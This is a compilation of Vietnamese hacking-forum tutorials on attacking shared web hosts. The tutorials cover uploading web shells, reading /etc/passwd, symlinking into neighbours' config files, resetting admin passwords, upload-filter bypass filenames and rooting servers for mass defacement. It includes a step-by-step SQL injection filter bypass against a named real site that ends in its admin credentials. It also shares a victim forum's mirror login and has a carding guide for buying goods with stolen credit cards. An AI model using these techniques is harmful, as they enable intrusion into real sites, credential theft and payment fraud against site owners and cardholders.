-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công

Nhận Dạng Các Loại mã hóa

1MySQL có 2 loại

60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự

2.MD4 có 3 loại:


bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự3.

MD5 có tới 5 dạng:

0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự

3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự

DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự

$1$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự

$apr1$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.

4.MSCash

9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8

5.SHA-1 có 2 loại:

7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự

local hack

rong bài viết có các con shell thì mọi người download bằng link này nhé:




http://www.mediafire.com/?miwmtymdiwy







Đầu tiên là ai cũng biết local là từ 1 host cùng sever với victim, ta sẽ lấy đc thông tin của thằng hàng xóm.

Tool là shell, ví dụ: r57, c99, perl shell, ... các loại này là phổ biến,




Đầu tiên là về con shell r57 nhé. Giao diện thì ai cũng biết rồi:




Trên cùng là info của sever. Các bạn tự đọc nhé, đến chỗ nào quan trọng thì mình sẽ nêu ra.







Con shell có dòng đầu tiên là Run command : ----> Cái này quan trọng vì nó để chạy lệnh (Nhưng mà khi safe mode là ON thì sẽ ko có dòng này)

Muốn tắt safe mode thì có nhiều cách. VD:

- Dùng php.ini , cái này thì trong 1 số con shell có sẵn.

- Hạ safemode bằng bug Cpanel, video: http://www.mediafire.com/?mzgmotmzzli







(Do hero1412 làm)

- Còn nếu mà ko đc thì thôi.




Đầu tiên là tìm list user ( Cái này quan trọng vì ko có thì bit local sang thế nào đây?)

get list user : cat /etc/passwd
less /etc/passwd

(Do file chứa user là passwd, còn file chứa pass thường là shadow, nhưng chúng ta ko xem đc đâu nhé, phải get root)

Còn nếu nó bật safe mode ON, ta get user bằng chức năng của con shell nhé, hoặc upfile này lên host và run





Quote:



$i = 0;

while ($i < 60000)

{

$line = posix_getpwuid($i);

if (!empty($line))

{

while (list ($key, $vl) = each($line)){

echo $vl."\n";

break;

}

}

$i++;

}

?>











Tut của [N]guye[N]




hoặc là





Quote:



include("/etc/passwd"); ?>


chú ý là .php nhé.







Có list user rồi

H là tìm victim cần local sang chứ ko phải là random 1 thằng.




User thường có đặc điểm sau:

- Giống tên web... VD "thitruong24h.com.vn" thì user là "vthitruong"

- Có thể trùng với họ tên của thằng đăng kí domain. Họ tên nó thì xem whois nhé. VD: "nguoithoxuan.com.vn" có user là thuanlq....(thằng admin tên lê thuận). Nếu nó dùng cc chùa thì chịu nhé.




Nêu ta ko muốn mò thì có thể xem error_log. path của nó đây ạ: /usr/local/apache/logs/error_log




Dùng lệnh: find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'domain.com' (Cái này cũng là error_log nhưng mà tiện hơn)

Khai thác xem nó có dính lỗi nào lòi path ra ko.

Cách check xem có phải user là của nó ko thì làm thé này nhé: http://ip của sver/~user --->Nếu ra site của nó thì đúng rồi




Local thì thường dùng các lệnh cơ bản sau:




cat /home/user/public_html/a.php (xem file a.php)

dir /home/user/public_html/bangnokia (xem thư mục bangnokia)

Nhưng mà thường thì viết trên r57 ko có tác dụng lắm vì chả còn cái sever nào như thế cả, Lệnh này thường dùng trên perl shell.

Sau đây là symlink, kĩ thuật này hay đc sử dụng,

Trích dẫn:

ln -s [path file cần xem] 1.txt

(1.txt là file để xem trên host mình. VD: ln -s /home/user/public_html/index.php 1.txt ----> File index.php của nó sẽ đc xem qua file 1.txt trên host của mình).




Mục tiêu của chúng ta là xem file config của nó, để vào database. File đó thường có các tên như: config.php, configuration.php,....

Còn nếu có tên khác thì chúng ta xem trong file index.php nhé, hàm trong đó thương phải gọi đên file config (Đọan nào mà có #include(abc.php).




Có rồi thì chúng ta connect vào database, set lại pass admin.

Vào Run SQL query

Điền đúng login/password/database

Sau đó bạn cần bit 1 chút về sql để update nhé.

Mình chỉ nêu 1 sô lệnh hay sử dụng thôi nhé.




update [table user] set [colum password]="xxxxxxxx" where userid="user id của admin"







Thế coi như là gần xong rồi nhé.




H nếu sever safe mode ON, ta ko symlink đc thì có thể via sql (Chú ý là sử dụng với php 4.X nhé)

Đầu tiên kíêm bừa 1 database, connect vào. Nếu shell có chức năg via sql thì có dòng load file, các bạn đánh các lệnh bt vào là đc




Các bạn đọc bài này rõ hơn nhé, nó có sử dụng cả load file : http://lamdongfamily.com/diendan/showthread.php?3791-TUT-Tut-Local-Via-Sql-C%C4%83n-B%E1%BA%A3n&p=6370#post6370







Nói chung là như thế nhé. H nếu sever ko làm đc những điều đó, ta sử dụng perl shell, 2 loại thường dùng là WebShell.cgi và telnet.cgi (có thể là .pl)

Up shell lên host. CHMOD 755, run nếu mà nó ko chạy thì ta up file .htaccess và đổi đuôi con shell. Cái này xem video sẽ hiểu nhé, có nhiều lắm, các bạn có thể tự tìm.

giao diện của shell là dòng lệnh, các bạn có thể dùng cat và dir để xem victim, nếu mà ko đc thi symlink, nếu mà cũng ko đc nữa thì up các file : cat, ln, .....chmod 777

Còn ko đc nữa thì làm tiếp theo tut của tracert admin xgroup

-Bypass lỗi 500 khi run perl shell. Video: http://www.mediafire.com/?mmnimgwmjt0







-Bypass chmod perl shell. Video: http://www.mediafire.com/?qqwkoiozrdq







Còn nếu ko đc nữa thì chuyển vào cgi-bin. Ko đc nữa thì mình hok bit.

Video local bằng cgi-telnet: http://www.mediafire.com/download.php?djnmntmgacm

http://www.mediafire.com/?zgyvdyilojg







H ta sẽ chú ý dòng này: Disable functions:

-Nếu là None thì nó ko cầm hàm nào, ta có thể sử dụng để khai thác. VD symlink:

PHP Code:

system('ln -s path 1.txt');

?>







Up lên host, run và xem kết quả. hehe

Các bạn có thể dùng các lệnh khác nữa nhé. AI pro thì chịu khó tìm hiểu.

-Nếu nó dis nhiều thì có phần gay đấy, Giống như là sever hostvn.net

Lúc đó ta sẽ có tut riêng, mình xin phép ko nêu ra bởi nếu thế thì loạn mất.







Với sever Win thì có thể dùng r57 cũng đc , nhưng thường thì là dùng aspxspy, kshell, net cat.

Video local bằng aspxspy2 by BangNokia: http://www.mediafire.com/?rkoymvkjyhm







Local bằng net cat by VQB: http://www.mediafire.com/?3jjfkhnjnt3













Lưu ý thêm là khi vào database, ta có thể chèn backdoor.

Chú ý xem nhé: http://milw0rm.com/video/watch.php?id=90







Và khi vào đc admincp của site nó, việc thường của mấy bạn là deface, nên phải tìm cách up shell.

Up trong vbb thì có thể qua đương skin hoặc plugin, trong các loại khác thì có các cách khác.

Video by kaihangty: http://www.mediafire.com/?1jh21nnmmdz







Và các loại khác thì các bạn tự linh động nhé. Nếu mà ko up đc thì thôi.







Cũng cần chú ý version php, để có thể by pass nếu có thể bằng các chức năng của shell.







Sau đây là về get root.




Cái này chỉ làm đc khi sever cho phép back connect.

Có nhiều cách làm lắm, mình chỉ nêu 1 số thôi nhé. Nói chung là cần có kernel exploit. Cái này thì vào milw0rm.com để tìm nhé.




VD: Linux nd-10754.tenamax.com 2.6.27.18-24 #1 SMP Wed Nov 4 2050 UTC 2009 x86_64 x86_64 x86_64 GNU/Linux ----> 2.6.27

Có thể dùng thêm cả mass để deface cả sever khi ta get root [IMG]file:///C:/Users/LENGUY%7E1/AppData/Local/Temp/msohtmlclip1/01/clip_image001.gif[/IMG]

Video get root: http://www.mediafire.com/?zjtjeny2iot







Safe_mode: OFF Open_Basedir: NONE Safe_Exec_Dir: NONE Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.12 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF




Về các cái phần còn lại này thì mình ko rõ lắm, nhưng mà thường ít sử dụng và mình cũng ko biết nhiều.




Chú ý:

-Theo cách mình hay làm thì mình thường brute, bởi nếu mà có 1 FTP thi upload rất là tiện lợi.

-Khi xem file config có thể nó điền database là FTP thì xong luôn.




Cuối cùng là 1 tut mà có phần đầy đủ của mình, mọi người xem cái này hộ nhé, hay lém đó: http://www.mediafire.com/?yxamlzqnntt







Thằng kimono bảo là ko nên pub nhưng mà thôi mình cứ pub.










Còn các cách khai thác bằng file .shtml thì mình có nêu trong video nhé (nhưng chỉ là 1 chút thôi), Các bạn phải tự tìm hiểu. Cái này chỉ dành cho newbie mà. (Nếu cái gì cũng bit luôn thì còn gì là suy nghĩ nữa chứ đúng ko? )










Sưu tầm !

Về UG

Hôm nay đã tìm đc định hướng, biết mình phải làm gì bây giờ :^^ lâu ko ghé BYG nên viết một bài chém gió ai có thời gian đọc thì đọc ^^

Shipping easy for… become shipper ^^

Trình độ em chưa đc “shipper” ko có thời gian cũng ko muốn coi đây là một nghề, rảnh thì ship
vài cái vặt mà ko muốn đi mua ^^, chia sẻ cho anh em từ lúc tìm shop đến khi nhận hàng.

Tìm seller.

Seller có rất nhiều và đến bây giờ nó cũng đã rất khôn, không còn như trước nữa… Đầu tiên vào
google tắt instant rồi đặt để có 100 kết quả một lần tìm; có thể fake ip qua us để máy tìm kiếm
bớt hiện mấy site việt nam.

Cách thông thường các pro chia sẻ:

-Lên tìm theo dork:
sản phẩm(bằng tiếng anh) + “international shipping” (hoặc) sản phẩm(bằng tiếng anh) + “worldwide shipping”

VD: mình muốn tìm site ship vài đôi giày sẽ gõ
converse shoes + “worldwide shipping”

Cách này dễ làm chăm chỉ sẽ ra site, nhưng kết quả nhiều lúc không như mong đợi toàn ra site
linh tinh.

Tiếp theo, cách này chắc cũng ko ít người biết là tìm theo dạng URL. Các shop sử dụng open
source ecommerce (mã nguồn shop online) thường mỗi mã nguồn lại có một dạng link khác
nhau. Theo một vài kinh nghiệm, mình tìm osCommerce.

Cơ bản tìm: inurl:index.php?cPath= -> ra một đống shop nhưng lại không theo mục đích. Để tìm
đúng thứ mình cần thì thay đổi dork một chút:


Sản phẩm(tiếng anh) + inurl:index.php?cPath=
VD: mua mũ: hat inurl:index.php?cPath= (nhớ là loại bỏ mấy trang tiếng việt)

Sao mình lại tìm osCommerce, vì mấy trang này payment hầu như là dễ qua.. chỉ cần ccn hoặc
ccv no cvv cũng qua được rồi. Hạn chế ở chỗ osC hiện giờ cũng không nhiều người dùng. Theo
kinh nghiệm từng người xem os nào hay dùng thì tìm. Vd open cart, prestashop

Cách nữa: tìm theo merchant, merchant có rất nhiều như authorize.net, worldpay, geotrust.. tùy
các bác thấy site nào dễ pay thì pay, nếu info ngon cả thì nên authorize. Phải tìm những câu mà ở
mấy shop có merchant này hay dùng, thưởng ở cuối site, ở faqs hoặc tos của site.

VD:
We authorize.net"e us

Nói chung, sau khi ăn xong một seller thì nên chú ý đến site xem có gì đặc biệt như đường link
rồi từ đó tìm những site liên quan.

Và nên nhớ google có rất nhiều công cụ hỗ trợ tìm kiếm. Chúng ta cứ tìm theo link trên nhưng
chả đc cái shop nào ngon do đã bị ăn nát bét rồi.. dùng công cụ thêm của google tìm theo 24h,
tuần qua, tháng qua thấy kết quả có sự thay đổi.

Thanh toán

Nên check CC trước khi thanh toán, biết địch biết ta trăm lần trăm qua

Việc sử dụng một con ccn để qua ko phải do site này ngon hay lởm mà là do người tạo shop
(mình nghĩ thế); dù payment direct ở trong site nó vẫn phải qua các merchant trung gian thông
qua API, nhiều site mình gặp là paypal direct payment mà ccv non info vẫn qua ko cần đúng
info.. nên nhớ phải thử nhiều rồi suy ra kết quả.

Sau khi thanh toán thì ko nền dùng con cc đấy mua cái gì khác vì có khi bank nó đơn phương
chặn giao dịch do có dấu hiệu đáng nghi; không may gặp phải mấy em cc sau khi thanh toán là
sms cho chủ thẻ thì chỉ có nước cầu trời Thanh toán thì cứ cc ngon là ok ko phải xoắn.

Led hay Ped

led nhiều mới ped nên cứ led vài lần là ped ngày ý mà

..Chờ nhận hàng thôi…

1 số tut sưu tầm

http://www.mediafire.com/?fl3z0th224j3d67#2

 http://www.mediafire.com/?eq67uaa7q98lfw3# 

local: http://www.mediafire.com/?tfjhpzn6e535q 

cach su dung shell: http://www.mediafire.com/?0bimdzhywxy

http://www.mediafire.com/?cr333aqlssteq 

http://www.mediafire.com/?123dny3n1tl 

://www.mediafire.com/?mm1kdiginin (shell r57) 

Kho Ebook: http://www.4shared.com/document/PDW0...huat_Hack.html http://www.mediafire.com/?zktueut95z31dcd 

http://www.mediafire.com/?8donaae228dxplw 

http://www.mediafire.com/?4x2lmjt2hwm

pass:www.vnitblog.com 

Tút hack local đầy đủ nhất bao gồm tất cả các phương pháp +video hướng dẫn+tool+shell cho từng trường hợp cụ thể cho anh em NBG thực hành http://www.mediafire.com/?an21zomneyl

AVS anh Order http://www.mediafire.com/?854v90cfdyd

Bypass up ảnh

Đổi shell php thành một trong các kiểu.
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

TUT local

Thấy TUT này hay nên up lên cho anh em newbie cùng học hỏi.
Bài 1: Local với những lệnh cơ bản
Sơ lược về bài 1:
-Hướng dẫn cách hạ safe_mode đơn giản. -Cách local đơn giản nhất, sử dụng lệnh cat, dir, cd -Cách connect vào db victim

Bài 2: Symlink file và thư mục
Sơ lược về bài 2:
-cách kiểm tra host dùng phần mềm quản lí gì? DirectAdmin hay Cpanel?
-cách tìm path user qua error_log
-cách symlink file và folder
-cách tìm file config trong vbb ver4.x

Bài 3: Lcoal với shell perl
Sơ lược về bài 3:
- Giới thiệu shell perl
- Những trường hợp hay gặp trong run shell perl
- Local với shell per
Link Downoad

• https://www.box.com/s/ad5dfb0b8a6160c26b6a
• Thêm mấy tut ( cŨ )
http://www.mediafire.com/?xsy02soqn3u6q8h

http://www.mediafire.com/?0qp8d0emq4ksxh7

TUT - Làm gì khi safe_mode ON ?

Khi gặp Safe_mode: ON thường ae ko làm được gì (ý nói newbie á). Jin lập Tut này hướng dẫn ae local khi gặp trường hợp này.

-- Bắt đầu nha --
I. Hạ safe_mode
Thử các cách sau:
a. Tạo file .htaccess ở root với nội dung sau:

• Code:php_flag safe_mode off

b. Tạo file php.ini ở root với nội dung sau:

1. Code:safe_mode = Off

c. Thêm đoạn code sau vào file cấu hình như config.php , data.php , global.php ,.. ( sau <?php nhé )

• Code:ini_set('safe_mode','Off');

Sau khi hạ safe_mode xong thì local như thường nhé.
II. Perl Shell
Nếu vì lí do nào đó mà bạn ko hạ sm được thì dùng thử Perl Shell nha. Perl Shell là shell (tất nhiên rùi) thường có đuôi dạng .cgi , .pl ,.. Và ko bị ảnh hưởng bởi cái sm quái qủy kia.
Download: http://www.hyperfileshare.com/d/1508da2e
Upload shell to host, ChMod 755 và run thử.
Nếu gặp lỗi 500 thì ta xem Tut này: http://www.mediafire.com/?mmnimgwmjt0 (mượn tạm của pro nào ý)
và Tut này http://www.mediafire.com/?qqwkoiozrdq
nếu ko được nữa thì move shell vào folder cgi-bin .
Cuối cùng, áp dụng hết pp trên mà ko được nữa thì... Bỏ con shell ấy đi. Hại não. Hìhì

[TUT] Bypass Filter + 403 Forbidden SQL Injection

Thấy bài này hay , post cho a e xem

Mọi người cùng tham khảo cách bypass nhé !



Victim :

Quote:
http://spaadam.com/vi/news.php?newsid=108


check lỗi :

Quote:
http://spaadam.com/vi/news.php?newsid=108'

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


-> Lỗi rồi nhé ! tiếp tục order


Quote:
http://spaadam.com/vi/news.php?newsid=108 order by 1-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'der by 1-- -' at line 1


đến đây ta thấy ! Filter đã được sử dụng , và nó đã cắn mất kí tự "or" trong "order by 1-- -" mà ta nhập

nó cắn mất thì ta thêm lại. bypass nó như sau :


Quote:
http://spaadam.com/vi/news.php?newsid=108 oorrder by 1-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1-- -' at line 1


-> Vẫn không được rồi . Bypass /*!*/ tiếp nhé :


Quote:
http://spaadam.com/vi/news.php?newsid=108 /*!oorrder*/ /*!by*/ 1-- -

Quote:
Một số hình ảnh mới về Spa Adam
Posted on 2012-03-15 14:37:25


-> Okay ! không lỗi rồi. giờ ta tiếp tục order ( đoạn này mình không giải thích nhiều, ai chưa hiểu thì xem tut cơ bản hơn nữa ) :


Quote:
http://spaadam.com/vi/news.php?newsid=108 /*!oorrder*/ /*!by*/ 7-- -

Quote:
Unknown column '7' in 'order clause'

Quote:
http://spaadam.com/vi/news.php?newsid=108 /*!oorrder*/ /*!by*/ 6-- -

Quote:
Một số hình ảnh mới về Spa Adam
Posted on 2012-03-15 14:37:25


-> Có 6 column .

Ta tiếp tục UNION SELECT -> tìm cột lỗi để khai thác


Quote:
http://spaadam.com/vi/news.php?newsid=-108 UNION SELECT 1,2,3,4,5,6-- -

Quote:
403 Forbidden


Bypas bằng /*!UNION*/


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNION*/ SELECT 1,2,3,4,5,6-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6-- -' at line 1


Có lẽ nào em nó đã cắn mất UNION SELECT của mình  !

Bypass :


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT 1,2,3,4,5,6-- -


Ô_Ô không thấy cái gì rồi ! giờ thay 108 bằng Null nhé 


Quote:
http://spaadam.com/vi/news.php?newsid=Null /*!UNIUNIONON*/ SESELECTLECT 1,2,3,4,5,6-- -


-> Vô nghĩa !

Tiếp tục thử thay số bằng Null ( 1,2,3,4,5,6 = Null,Null,Null,Null,Null,Null )


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,Null,Null-- -


Đối với việc thay số bằng nulll như thế này ! ta có thể khai thác thử từng vị trí Null khác nhau để tìm vị trí Null lỗi rồi tiếp tục khai thác .


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,version(),Null-- -


Vị trí Null số 5 đã lỗi và xuất hiện kết quả nhưng đã bị mất ở đầu .


Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.9-MariaDB-mariadb102' at line 1


giờ dùng cách sau +kết hợp bypass để nó ra đầy cmn đủ 


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!concat(0x7c,version())*/,Null-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|5.2.9-MariaDB-mariadb102' at line 1


có version rồi ! giờ ta tiếp tục khai thác table + kết hợp bypass /*!*/ ở Null thứ 5


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!table_name*/,Null /*!from*/ information_schema./*!tables*/ where table_schema=database()-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near './*!tables*/ where table_schema=databe()-- -' at line 1


Nó cắn đi khá nhiều "from information_schema" và cả as của database

như lúc order by với union. nó cắn ở đâu thì ta vá lại ở đó :


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!table_name*/,Null /*!frfromom*/ information_schema./*!tables*/ where table_schema=databaasse()-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'infmation_schema./*!tables*/ where table_schema=database()-- -' at line 1


bypass được 2 thứ . kết quả show ra còn 1 thứ nữa. mất or trong từ information

Nào cùng vá lại nó :


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!table_name*/,Null /*!frfromom*/ infoorrmation_schema./*!tables*/ where table_schema=databaasse()-- -

Quote:
Unknown column 'admin' in 'where clause'


Ra table admin luôn. khỏi cần dùng limit để tìm em nó 

tiếp tục khai thác column trong table admin


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!column_name*/,Null /*!frfromom*/ infoorrmation_schema./*!columns*/ where table_schema=databaasse() and table_name=0x61646d696e-- -

Quote:
Posted on


Nhưng Khi :


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!group_concat(column_name)*/,Null /*!frfromom*/ infoorrmation_schema./*!columns*/ where table_schema=databaasse() and table_name=0x61646d696e-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'username,password' at line 1


okê rồi ! giờ đã có 2 column cần khai thác. giờ tiến tới data


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!username*/,Null /*!frfromom*/ admin-- -

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1


Không ra cái gì . Bị cắn phần đuôi . chắc là đã mất từ admin. vá cả cái admin


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!username*/,Null /*!frfromom*/ adadminmin-- -

Quote:
Unknown column 'admin' in 'where clause'


Nick admin là admin


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!password*/,Null /*!frfromom*/ adadminmin-- -

Quote:
Unknown column 'pswd' in 'field list'


pswd hiện ra nhưng đây không phải password của nó ! 

mà là password đã bị nó cắn thôi. giờ TÁT vỡ mồm nó vì cái tội cắn từ đầu đến cuối nhé


Quote:
http://spaadam.com/vi/news.php?newsid=-108 /*!UNIUNIONON*/ SESELECTLECT Null,Null,Null,Null,/*!paassswoorrd*/,Null /*!frfromom*/ adadminmin-- -

Quote:
Unknown column '5f8f9e33bb5e13848af2622b66b2308c' in 'where clause'


Nick: admin
Pass: vietnam ( anh em gg táng 5f8f9e33bb5e13848af2622b66b2308c vào nhé  )

Tut hết tại đây. Có gì sai sót mong anh em góp ý 

[Local Attack] Các Phương Pháp Local Attack

1- Local Attack Là gi ?


Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công vào một website có bảo mật kém chung server với website mục tiêu. Sau đó tấn công sang website mục tiêu bằng kỹ thuật Local.



2- Các bước thực hiện trong local attack



- Xác định các website chung server với site mục tiêu.
http://ceh.vn/Reverse/
http://www.vhbgroup.net/ip/
- Check qua toàn bộ server, xác định site có bảo mật kém có thể tấn công bằng các hình thức:
SQLI, RLI, LFI, XSS, DNN, IIS, Bugs….
- Up shell lên website có bảo mật kém
- Local sang Site mục tiêu




3- Nhiệm vụ của local


- Tìm file config
- Thu thập thông tin login vào cơ sở dữ liệu của victim
- Login vào csdl, xác định username và password được mã hóa của victim
- Crack hoặc thay đổi password của victim.


4- Các kỹ thuật Local


- Sử dụng các lệnh cơ bản: Dir, cat,….
- Symlink cơ bản.
- Symlink kết hợp với SSI.
- Face symlink, Indirec Symlink
- Backconnect
- Via SQL
- Các kỹ thuật Bypass
……


Đỉnh cao của kỹ thuật local là Get root.


Một số shell thông dụng:


r57.php

http://www.mediafire.com/?25gsg6fqtp48cdl

R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.




This image has been resized.Click to view original image





c99.php


http://www.mediafire.com/?npsob8c7dd9nr40


Nói đến r57 cũng không thể không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu




This image has been resized.Click to view original image





byg.php


http://www.mediafire.com/?33wykc6rumc3cf9

Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng




This image has been resized.Click to view original image






pass login: byg


vhb.php

http://www.mediafire.com/?hr9acl1yd1eabcw

Con shell này đã được mình Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà mình thường sử dụng nhất.





This image has been resized.Click to view original image



Pass login: vhb
soleil.pin




Nếu Server Safe_mod: ON, cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.





This image has been resized.Click to view original image






Pass login: ducdung.08clc


Cách sử dụng:

-Up shell soleil.pin và chmod nó về 755

-Up hoặc tạo file .htaccess có nội dung:



## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##


Hoặc:

Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .pin
AddHandler cgi-script .pin



-telnet.php




http://www.mediafire.com/?t9cavs1n0ipthq1

Để sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu shell telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin

Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là run ngon.




This image has been resized.Click to view original image





Face symlink:


http://www.mediafire.com/?fc9kencnilx0rm4






This image has been resized.Click to view original image





Get user:


http://www.mediafire.com/?gic70c6ce441333












Get user và domain


http://www.mediafire.com/?6n3x3nb340dq2g8






This image has been resized.Click to view original image





Shell này cần chmod về 755 trước khi sử dụng


http://www.mediafire.com/?2rk42hiv9b4ii3f





This image has been resized.Click to view original image






Get all config


http://www.mediafire.com/?hi4gnmu3kpxn095






This image has been resized.Click to view original image





SSI


http://www.mediafire.com/?vyqfaap9aarl75v


Backdoor.php


http://www.mediafire.com/?etciiuskzvyhjcw


Netcut


http://www.mediafire.com/?npsob8c7dd9nr40


zipcode.php


http://www.mediafire.com/?83ocom3w4r6ilfp


r57bypass.php (vip)



http://www.mediafire.com/?sqjs5du3srlifqt


Check Shell : Kiểm tra shell có trên site


http://www.mediafire.com/?ruh9r1i2d2tcpvn


Priv8_2012.php



http://www.mediafire.com/?2hw2xr8wpg902er


saoluu.php


http://www.mediafire.com/?ajm9l3uhgxx9jq6


Shell xml: Up shell đối với vbulletin


http://www.mediafire.com/view/?tdhe6l8bb676woq

http://www.mediafire.com/view/?nw1y3ui404zufyd


root.tar.gz: Dùng để sym root hay indirect sym

http://www.mediafire.com/?21kycoh4g5s4ojo


Và rất nhiều shell khác với 1 số tính năng đặc biệt khác nữa.


Pass download: soleil_vhb

Tham khảo:

http://ducdung08clc.blogspot.com/201...-so-shell.html


Bài 3 mình sẽ giới thiệu 1 sô câu lệnh thường được sử dụng trong Local Attack và các kỹ thuật get file config.


Nhắc lại trình tự các bước Local Attack
1- View danh sách các user trong server

2-Tìm file config.php

3-Get thông tin login vào database

